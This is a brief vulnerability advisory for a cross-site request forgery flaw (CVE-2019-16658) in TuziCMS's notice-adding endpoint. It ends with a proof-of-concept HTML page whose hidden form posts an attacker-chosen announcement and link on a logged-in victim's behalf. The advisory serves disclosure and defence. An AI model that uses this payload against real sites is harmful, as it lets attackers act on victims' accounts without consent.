Cross-site request forgery in TuziCMS - CVE-2019-16658
Published: September 23, 2019
TuziCMS
Detailed vulnerability description
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin in the "index.php/manage/notice/do_add". A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as post announcements.
Example:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[host]/tuzicms-master/index.php/manage/notice/do_add" method="POST" enctype="multipart/form-data">
<input type="hidden" name="notice_title" value="hacker" />
<input type="hidden" name="notice_url" value="http://www.hacker.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>